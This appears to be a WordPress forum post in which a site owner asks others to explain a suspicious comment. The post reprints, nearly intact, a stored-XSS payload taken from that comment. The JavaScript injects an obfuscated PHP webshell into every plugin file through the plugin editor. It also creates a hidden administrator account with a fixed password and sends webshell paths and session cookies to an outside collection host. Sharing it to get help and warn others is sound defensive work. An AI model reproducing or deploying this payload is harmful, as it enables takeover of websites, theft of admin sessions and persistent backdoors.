Is this a "Hello-World" blog post hack of some kind?
-
Dear community,
I’m running the latest WP and today I think someone is trying to hack my site. I thought I’d post what I’ve found to see how dangerous you think it is and perhaps protect others from the same thing.
I was suspicious after receiving an automated email from my site that a blog post needed moderation. The email contained embedded code encoded in what appeared base64. The first few lines looked like this:
A new comment on the post “Hello world!” is waiting for your approval
https://***my_web_site***/hello-world/Author: meyer (IP: 52.33.164.81, ec2-52-33-164-81.us-west-2.compute.amazonaws.com)
Email: [email protected]
URL: https://www.facebook.com/pafghijn
Comment:
hellonice odszov<abbr><a href=’
href=”‘> ?? <abbr title='” onmouseover=”var file = ""; var xurl = "plugin-ediDecoding the base64 revield the following code that appeared would run on mouseover of the smiley face characters (note I altered the code below to ensure it didn’t result in a href link or mouseover event in this post!:
Can anyone tell me what this is doing (or has done!) as I’m not that great at php?:
hellonice odszov<abbr><a h*ref=’
h*ref=”‘> ?? <abbr title='” on*mouse*over=”
var file = “”;
var xurl = “plugin-editor.php”;
var Aurl = “user-new.php”;
var file2= [];
var shell= [];
var recieve=”https://g.fr9.co/xss/recieve.php”;//recieve.php ???????
var StartGetshell = 1; //??getshell???? 1?? 0??
var shellcode = “<?php\nif(isset($_POST[‘dak’])){($www = $_POST[‘dak’]) && @preg_replace(‘/ad/e’, ‘@’ . str_rot13(‘riny’) . ‘($www)’, ‘add’);exit;}”;
var tempname = location.href.substring(location.href.indexOf(‘wp-admin’),location.href.length);
var laurl = “https://web.51.la:82/go.asp”;if(!window.x){
var _st = window.setTimeout;
window.setTimeout = function(fRef, mDelay) {
if(typeof fRef == ‘function’){
var argu = Array.prototype.slice.call(arguments,2);
var f = (function(){ fRef.apply(null, argu); });
return _st(f, mDelay);
}
return _st(fRef,mDelay);
}
}
function fuckxss(){
var tempshell = “”;
jQuery.ajax({
url: xurl,
type: ‘GET’,
dataType: ‘html’,
data: {},
})
.done(function(data) {
var temp = jQuery(data);
var Xtoken = “”;
var Tmpcode = “”;
temp.find(‘input#_wpnonce’).each(function(i,o){
var o=jQuery(o);
Xtoken=o.attr(‘value’);
});
temp.find(‘div.alignleft big strong’).each(function(i,o){
var o=jQuery(o);
file = o.text();
});
temp.find(‘textarea#newcontent’).each(function(i,o){
var o=jQuery(o);
if(o.text().indexOf(‘$www = $_POST[\’dak\’]’)>0){
SenData(‘shell has presence,Path: ‘+location.href.replace(tempname,”wp-content/plugins/”+file)+” Password: dak\r\nCookie: “+document.cookie);
return false;
}
Tmpcode = o.text().replace(‘<?php’,shellcode);
});
temp.find(‘select#plugin option’).each(function(i,o){
var o=jQuery(o);
file2.push(o.attr(‘value’));
});
if(Xtoken&&Tmpcode&&file){
jQuery.ajax({
url: xurl,
type: ‘POST’,
data: {‘_wpnonce’:Xtoken,’newcontent’:Tmpcode,’action’:’update’,’file’:file,’plugin’:file,’submit’:’Update+File’}
})
.done(function(){
SenData(‘Webshell: ‘+location.href.replace(tempname,”wp-content/plugins/”+file)+” Password: dak”);
return;
})
}
if(StartGetshell){
for(var i=0;i<file2.length;i++){
window.setTimeout(GetAllShell,150,file2[i]+”|”+file2[file2.length-1]);
}
}
})
}
function GetAllShell(target){
var TmpArr = target.split(“|”)[1];
var filename = target.split(“|”)[0];
if(filename!=file){
jQuery.ajax({
url: xurl,
type: ‘POST’,
data: {‘plugin’: filename,’Submit’:’Select’},
})
.done(function(data) {
var NewCode = “”;
var NewToken= “”;
var Getshell=jQuery(data);
Getshell.find(“textarea#newcontent”).each(function(i,o){
var o=jQuery(o);
if(o.text().indexOf(‘$www = $_POST[\’dak\’]’)>0){
shell.push(‘shell has presence,Path: ‘+location.href.replace(tempname,”wp-content/plugins/”+filename)+” Password: dak”);
console.log(filename+” x “+TmpArr);
if(filename==TmpArr){
SenData(shell.join(“\r\n”));
}
return false;
}
NewCode = o.text().replace(‘<?php’,shellcode);
});
Getshell.find(“input#_wpnonce”).each(function(i,o){
var o=jQuery(o);
NewToken = o.attr(‘value’);
});
if(NewCode&&NewToken){
jQuery.ajax({
url: xurl,
type: ‘POST’,
data: {‘_wpnonce’:NewToken,’newcontent’:NewCode,’action’:’update’,’file’:filename,’plugin’:filename,’submit’:’Update+File’}
})
.done(function(){
shell.push(‘Webshell: ‘+location.href.replace(tempname,”wp-content/plugins/”+filename)+” Password: dak”);
console.log(filename+” “+TmpArr);
if(filename==TmpArr){
SenData(shell.join(“\r\n”));
}
return;
})
.fail(function(){
shell.push(location.href+’: GetShell ‘+filename+’ Failure’);
})
}
})
}
}
function adduser(){
jQuery.ajax({
url: Aurl,
type: ‘GET’,
dataType: ‘html’,
data: {},
})
.done(function(data) {
var temp = jQuery(data);
var Xtoken = “”;
temp.find(‘input#_wpnonce_create-user’).each(function(i,o){
var o=jQuery(o);
Xtoken=o.attr(‘value’);
});
jQuery.ajax({
url: Aurl,
type: ‘POST’,
data: {‘action’: ‘createuser’,’_wpnonce_create-user’:Xtoken,’user_login’:’obuser’,’email’:’[email protected]’,’first_name’:”,’last_name’:”,’url’:”,’pass1′:’obpass’,’pass2′:’obpass’,’role’:’administrator’,’createuser’:’Add+New+User+’}
})
.done(function(){
SenData(location.href+’: Add Administrator success User: obuser Password: obpass’+’\r\n\r\n’);
});
jQuery.ajax({
url: laurl,
type: ‘GET’,
data: {‘svid’:13,’id’:18646852,’vpage’:location.href}
})
})
}
function SenData(data){
jQuery.ajax({
url: recieve,
type: ‘POST’,
data:{“Data”:data}
})
}
if(!window.x){window.x=1;fuckxss();adduser();};
- The topic ‘Is this a "Hello-World" blog post hack of some kind?’ is closed to new replies.